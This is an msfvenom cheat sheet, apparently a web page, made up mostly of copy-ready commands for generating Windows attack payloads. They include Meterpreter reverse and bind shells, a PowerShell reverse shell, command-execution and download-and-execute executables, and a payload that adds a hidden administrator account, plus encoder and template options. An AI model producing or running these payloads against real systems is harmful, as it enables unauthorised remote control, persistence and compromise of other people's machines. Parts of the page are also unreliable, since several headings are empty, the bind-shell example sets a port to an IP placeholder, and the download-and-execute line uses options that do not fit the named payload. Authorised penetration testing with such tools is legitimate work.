The msfvenom cheat sheet should give you an overview of the most important msfvenom commands. Some of the commands listed below may need to be customized to meet your specific requirements.


Set the LHOST

Set the LPORT

Set the RHOST

List options


List all the available payloads

msfvenom -l payloads


List all the available encoders

msfvenom -l encoders

generating a payload

The structure of the payload would look something like this

msfvenom -p <PAYLOAD> -a <x86/x64> --platform <platform> -e <encoding> -f <output-format>

It's also possible to set a custom payload. Then first generate the custom payload and use cat with a pipe to use it within msfvenom. The payload flag (-p) then should be set to "-"

cat custom-payload.bin | msfvenom -p - -a <x86/x64> --platform <platform> -e <encoding> -f <output-format>

Common windows payloads

Meterpreter reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=LISTEN-IP LPORT=<listen-port> -f exe > reverse-shell.exe

Meterpreter bind shell

msfvenom -p windows/meterpreter/bind_tcp RHOST=<remote-ip> LPORT=LISTEN-IP -f exe > bind-shell.exe

Meterpreter reverse powershell shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=LISTEN-IP LPORT=<listen-port> -f psh -o meterpreter-powershell64.ps1

Execute command

msfvenom -p windows/exec CMD=<command-to-execute> -f exe > command.exe

Download and execute

msfvenom -p windows/exec URL=<url-to-executable> EXE=<filename-to-save-and-run> -f exe > command.exe

Add admin user

Creates a user and adds it to the local administrator group.
Keep in mind you would still need to fulfill the local administrator password requirements of: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)

msfvenom -p windows/adduser USER=<username> PASS=<password> -f exe > adduser.exe

Common Linux payloads

msfvenom options

    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
        --help-platforms             List available platforms
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

Additional information

This msfvenom cheat sheet might not be fully complete and it's recommended to check out the references to find if additional options might fit your needs.

msfvenom replaced msfpayload and msfencode as of June 8th 2015.